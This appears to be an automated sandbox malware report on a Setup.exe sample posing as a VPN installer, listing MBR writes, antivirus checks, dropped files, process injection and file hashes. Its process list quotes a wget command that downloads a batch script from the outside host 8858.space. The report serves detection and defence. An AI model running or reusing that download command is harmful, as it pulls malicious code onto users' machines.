Malware Analysis Report

2024-09-23 12:37

Sample ID 240612-rgrlksxgnc
Target Setup.exe
SHA256 96e4ec16ccd374b8be624079f68012d1707af8e31f66885dfbacbde8b407f208
Tags
bootkit discovery persistence
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

96e4ec16ccd374b8be624079f68012d1707af8e31f66885dfbacbde8b407f208

Threat Level: Shows suspicious behavior

The file Setup.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

bootkit discovery persistence

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Checks for any installed AV software in registry

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-12 14:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 14:10

Reported

2024-06-12 14:11

Platform

win10v2004-20240508-en

Max time kernel

33s

Max time network

40s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp N/A

Checks installed software on the system

discovery

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\a.bat C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Wget\bin\libeay32.dll C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\s.txt C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Wget\bin\libiconv2.dll C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Wget\bin\libintl3.dll C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Wget\bin\libssl32.dll C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Wget\bin\wget.exe C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\curl\curl.exe C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\Set-up.exe C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 4796 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 4796 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Set-up.exe
PID 2328 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Set-up.exe
PID 2328 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Set-up.exe
PID 2328 wrote to memory of 2916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 2916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 2916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2328 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2328 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2328 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4624 wrote to memory of 2024 N/A C:\Windows\Set-up.exe C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 4624 wrote to memory of 2024 N/A C:\Windows\Set-up.exe C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 4624 wrote to memory of 2024 N/A C:\Windows\Set-up.exe C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp
PID 2328 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Wget\bin\wget.exe
PID 2328 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Wget\bin\wget.exe
PID 2328 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Wget\bin\wget.exe
PID 2024 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe
PID 2024 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe
PID 2024 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\a.bat" "

C:\Windows\Set-up.exe

C:\Windows\Set-up.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver "

C:\Windows\SysWOW64\findstr.exe

findstr /IL "5.1."

C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp" /SL5="$401EA,20689414,209920,C:\Windows\Set-up.exe"

C:\Windows\Wget\bin\wget.exe

C:\Windows\Wget\bin\wget.exe -c -P "C:\Windows" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="avgvpn"

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

"C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe" /setup-pid:2024 /watchdog-watching-evt:Local\AvgVpnSetupWatchdogIsWatchingEvent /setup-log:"C:\Users\Admin\AppData\Local\Temp\Setup Log 2024-06-12 #001.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8858.space udp
US 8.8.8.8:53 avg.tools.avcdn.net udp
US 8.8.8.8:53 analytics.ff.avast.com udp

Files

C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp

MD5 c2228fd017a3c8834ae10f2c55d1bad3
SHA1 c19c01b335b1e8b163334e54586ffdeb7750a1a3
SHA256 c93ba3b649ff3e0aff7974da423702eae28975f65afd8eea4f1942c0da5abe86
SHA512 092ea49fa883c55069d7a8f3cfaa67db52c399e504168f80f3e5026af4bb23217544ed064239ecbc8fb64d6aa675f382397e436a055801b42b3e61392fa58663

C:\Windows\a.bat

MD5 3a42629bc4d36ba374debe5f247d17a0
SHA1 905c303362e994011942f41d1609d7540211fa20
SHA256 81a99b0caacfbf55933caee67eca6165e39b37d0d554ab7a170af490250838be
SHA512 76359b0c71aed2852c74c664a7488ec0ceb49371e5fef1c3f30b56cac66caa5291cbb6dc6d574936e5db462ac0989dd425360f647ba81e3601c465347f58508d

memory/4796-47-0x0000000000400000-0x0000000000449000-memory.dmp

C:\Windows\Set-up.exe

MD5 8ddd444ec6c15507f0fc107b28945559
SHA1 54573229e4f967d65d382d25e364f91b19986930
SHA256 6cb44d89a8fce1c83ac49aa333b2247ab7974ea11b4eccc36c52ec1987a3ebe4
SHA512 4de5eb4b41f696eeffbb835f0a6122190dd1b2946800204ab5458efa3781fe8177b17a3b6704ebc0f6c49aaa613b11560d5cd7df51d617748fdf9fe3a60ee420

memory/4624-51-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4624-54-0x0000000000401000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5E6G5.tmp\Set-up.tmp

MD5 d1d1c7b229162cb1634984439b665b95
SHA1 fc77b253db5d3b5342a1496d6614fc542da94b1a
SHA256 b9da54afd552e36956d1c28c8961f8680372dc7fcb87298f32ed3f465143943d
SHA512 3c32dc06c250fedf0c78b7f236c378eda14c9a7f22c5b6d9cdeafbd84f2b01b5dd421049c92ca495b4f4c30155ceef536b779cde253ab4947dc16e8c15d77787

C:\Windows\s.txt

MD5 9bb5208c5c9576614b5444f0cf56feac
SHA1 c1a7816131944842c6132b67a10349da667bd537
SHA256 d5a31703c2a34d39825c272342b02538ece2fd0a8d7d1adb15a338ede0cb2b51
SHA512 305581e79c585b99004c507b9a3403cf5832900d26d6af55113666c06d29ed2b92b34a579f83f1acaab5aa92e4080bee4208358c64a13d863706252e5f398c03

C:\Windows\Wget\bin\wget.exe

MD5 aa173375c21ea31b8cc615dccb54e43b
SHA1 a00ea43c0ebbed364a606da39526f1dbed37e91e
SHA256 cf02b7614fea863672ccbed7701e5b5a8fad8ed1d0faa2f9ea03b9cc9ba2a3ba
SHA512 55f6b509f1b2e9229d8a9526c8f50e696708c81d6339b59aaf807bc6283ed2e5277f654cd5ab77b018db5d5adeb02a64001080838fbfd79634ff88af0049a0d2

C:\Windows\Wget\bin\LIBEAY32.dll

MD5 6b854ffc12e5e2c32683a03714cf6c5d
SHA1 c8e5c0f57e18dfc5226ff0bd5bc63607e1754c66
SHA256 95550b81825ae3fb4298b0de1f7ebd116754d99483a6d73cc7271e002484a928
SHA512 92b8908875b3376d60b19bb0e812b678870c70d708a278c781bd7ad30fdc96464c2038d578152ab7c2e7394f089ba399a55b5d5d7b7179a321b1bd1ef28215bd

C:\Windows\Wget\bin\libssl32.dll

MD5 37580b9354e984bf7c1a2b4ed7fa824b
SHA1 f750f7b6214f5d03d4d6bb40a15b93b6f0820354
SHA256 5e0fae7ffec8ddbaa5d6be610ab99f6a3b671d957a6aa601091acb0dae1921dc
SHA512 78a02d26007ba9631c85e7b0d1209ed1b854c21e348986039bb74782240b432234db493a5ad0efc6100beb5e9c82633cb3b3e93e282aa686124ffc31e0483d5a

C:\Windows\Wget\bin\libintl3.dll

MD5 d202baa425176287017ffe1fb5d1b77c
SHA1 192e597d8ff0192f6c4e4643361f84277ed51121
SHA256 f48ce1866602b114e653c876334b771107559acf1c685373d2305034613958f0
SHA512 706d74c56ce8d08539c729bdb6c8d57c9a4b0a1c795b8574a1bb2c452358e1bfd5d4fca5a00ab7568dea4ae02c553ce6ab199b3c6418a44cb8915f7e26bd2988

C:\Windows\Wget\bin\libiconv2.dll

MD5 e0dc8c6bbc787b972a9a468648dbfd85
SHA1 0f73d47122080a0c5c423841b16f4e6c62d79aff
SHA256 6deedad652bfab7b09ebd0e06045810390b6ac6cb5aa9ef41c9daa5616181f22
SHA512 afef454b85fb28b41fc4261188fee7a3122e2986b2e1a47e66fce9005cb2ec69c47644115bc52b9719eed15707978262b80e18eedadd0b39ccf5f2b441654a13

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\SetupHelper.dll

MD5 ab64a924af4a4be440b2765823048936
SHA1 92e085c2ac3d3353ed6bdc019a88eaa4a57af876
SHA256 7c37d5ba3618cacda09d55af88aa881c27af607c3add483fc54c8911d771ba0d
SHA512 cd50eb228b4d89cad5767abe7f59e964e9e89293bf95318a6fb5e4e862a3b0222b268ad8643c9cd00d561e8fa6e30ff93e8b597c5822988061b882cf0d38dc64

memory/4624-75-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1596-77-0x0000000000400000-0x0000000000479000-memory.dmp

memory/1596-81-0x0000000067200000-0x00000000672FB000-memory.dmp

memory/1596-80-0x0000000060E40000-0x0000000060E5D000-memory.dmp

memory/1596-79-0x000000006C380000-0x000000006C3BE000-memory.dmp

memory/1596-78-0x0000000063080000-0x00000000631A8000-memory.dmp

memory/2024-76-0x0000000000400000-0x0000000000542000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-U93J1.tmp\VpnSetupWatchdog.exe

MD5 ac1a5aabf7b0eeb53e45578a5bb90137
SHA1 02518d40650346f2d0ab4266d853f47543c1405b
SHA256 b11b4412680909374f4a28adacdc802167101c8b7deb5c47a8ee40ca1e731800
SHA512 577cef7731cf5dcc1638fc11b060bc723e2d5e2e4472c7b693cb92f53ab839c4746f0cbd4bd66f2b054dc5a2cba4c167de88c20951880beb452bcdaebdc11e5d

memory/1596-88-0x000000006C380000-0x000000006C3BE000-memory.dmp

memory/1596-87-0x0000000063080000-0x00000000631A8000-memory.dmp

memory/1596-89-0x0000000060E40000-0x0000000060E5D000-memory.dmp

memory/1596-86-0x0000000000400000-0x0000000000479000-memory.dmp

memory/1596-90-0x0000000067200000-0x00000000672FB000-memory.dmp

memory/2024-92-0x0000000000400000-0x0000000000542000-memory.dmp

memory/2024-97-0x0000000000400000-0x0000000000542000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Setup Log 2024-06-12 #001.txt

MD5 11a78bfe3dc1bd339e19ff2138e153ce
SHA1 a3caa3267bd5d49be150a3ede31560f9f4f68340
SHA256 001a916579a53828e06f145874e382145d08273102bbbc8ec05cac7d1ceb6195
SHA512 93d0632c5e56197d445d3f1d072b5ac93f118804166bb6b9e4af98e7a5f3f72ad7d3dd1244843db927cf218c69c5274a93dd9661a5cd7db7b1ad30094a3e906f

memory/4624-100-0x0000000000400000-0x000000000043D000-memory.dmp